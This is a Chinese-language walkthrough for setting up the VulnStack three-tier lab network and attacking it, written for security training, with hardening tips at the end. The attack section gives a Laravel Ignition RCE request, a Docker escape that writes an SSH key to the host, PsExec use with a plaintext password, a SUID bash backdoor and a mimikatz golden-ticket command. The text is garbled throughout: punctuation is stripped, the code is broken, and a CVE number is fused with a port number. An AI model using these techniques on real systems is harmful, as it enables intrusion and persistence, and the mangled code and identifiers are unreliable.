
红日VulnStack靶场环境搭建与三层网络渗透实战指南1. 靶场环境概述与核心价值红日安全团队推出的VulnStack靶场已成为国内ATTCK实战演练的标志性平台其独特的三层网络架构DMZ区、二层内网、核心内网高度还原了企业真实网络环境。本次靶场基于Ubuntu 18.04与Windows域环境构建包含Docker容器、通达OA系统等典型企业组件为安全从业者提供了从外网突破到横向移动的完整攻击链实践场景。核心训练价值掌握多网卡系统的路由配置与流量控制实践从Web应用到系统层的权限提升技巧学习Docker环境逃逸与容器安全防护演练Windows域环境下的横向渗透手法培养三层网络穿透的战术思维2. 环境搭建详解2.1 硬件与网络准备基础配置要求VMware Workstation 15 或 VirtualBox 6.0分配内存 ≥ 8GB建议12GB固态硬盘剩余空间 ≥ 50GB网络拓扑规划网络区域IP段可访问范围关键主机DMZ区192.168.36.1/24可访问外网Ubuntu (Web1)双网卡二层内网192.168.52.1/24仅DMZ和三层内网Ubuntu (Web2)、Windows 7三层内网192.168.93.1/24仅二层内网Windows Server 20122.2 虚拟机配置步骤Ubuntu主机配置# 网卡1桥接模式 auto ens33 iface ens33 inet static address 192.168.36.128 netmask 255.255.255.0 gateway 192.168.36.1 # 网卡2仅主机模式 auto ens38 iface ens38 inet static address 192.168.52.10 netmask 255.255.255.0Windows域控关键配置安装Active Directory域服务创建域vulnstack.com配置DNS正向解析区域将其他Windows主机加入域注意所有Windows主机需关闭防火墙或设置允许ICMP、SMB等内网通信协议2.3 服务启动清单DMZ区服务# 启动Nginx和Redis sudo systemctl start nginx sudo redis-server /etc/redis/redis.conf sudo iptables -F # 清除防火墙规则二层内网服务# 启动Docker容器 sudo systemctl start docker sudo docker start 8e172820ac78 # Redis容器三层内网服务启动通达OAC:\MYOA\bin\AutoConfig.exe验证域控服务Get-ADDomainController3. 渗透实战路径3.1 外网突破阶段信息收集nmap -sV -p- 192.168.36.128 -oA initial_scan典型发现80端口Nginx服务www.whopen.com81端口Laravel v8.29.0存在CVE-2021-31296379端口Redis未授权访问漏洞利用示例# Laravel Debug RCE利用 import requests url http://192.168.36.128:81/_ignition/execute-solution headers {X-XSRF-TOKEN: ...} data {solution: Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution, parameters: {viewFile: php://filter/writeconvert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource../storage/logs/laravel.log}} requests.post(url, headersheaders, jsondata)3.2 内网横向移动Docker逃逸技术检测容器环境ls -alh /.dockerenv cat /proc/1/cgroup | grep docker特权模式逃逸# 挂载宿主机磁盘 mkdir /mnt/host mount /dev/sda1 /mnt/host # 写入SSH密钥 echo ssh-rsa AAAAB3... /mnt/host/root/.ssh/authorized_keysWindows域渗透# 使用PsExec横向移动 .\PsExec.exe \\192.168.93.30 -u Administrator -p Whoami2021 -h -d cmd.exe3.3 权限维持技术Linux后门# 创建SUID后门 cp /bin/bash /tmp/.shell chmod 4777 /tmp/.shellWindows黄金票据# 使用mimikatz生成 kerberos::golden /admin:Administrator /domain:vulnstack.com /sid:S-1-5-21-... /krbtgt:哈希值 /ticket:golden.kirbi4. 防御加固建议4.1 网络层防护实施严格的网络分段策略禁用ICMP协议跨区域通信配置防火墙限制Docker API访问4.2 系统层加固Ubuntu加固# 禁用不必要的服务 sudo systemctl disable redis-server # 限制Docker权限 sudo usermod -aG docker restricted_userWindows域加固# 启用LSA保护 Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 14.3 应用安全Laravel关闭DEBUG模式Redis配置认证密码通达OA及时安装安全补丁5. 高阶技巧与排错常见问题解决方案跨网段通信失败检查虚拟机网络适配器连接状态验证路由表route -n或Get-NetRouteDocker容器无法启动# 查看容器日志 docker logs 8e172820ac78 # 重置容器网络 docker network prune域认证失败验证域控DNS记录检查NTP时间同步ATTCK技术映射攻击阶段对应技术ID防御建议初始访问T1190定期漏洞扫描权限提升T1068最小权限原则横向移动T1021.002 (SMB)网络微隔离持久化T1543.003 (服务)服务白名单监控通过本靶场的系统化演练安全团队可有效检验现有防御体系对复杂攻击链的检测与响应能力。建议在实战中结合ATTCK框架进行攻击行为标注持续优化安全运营流程。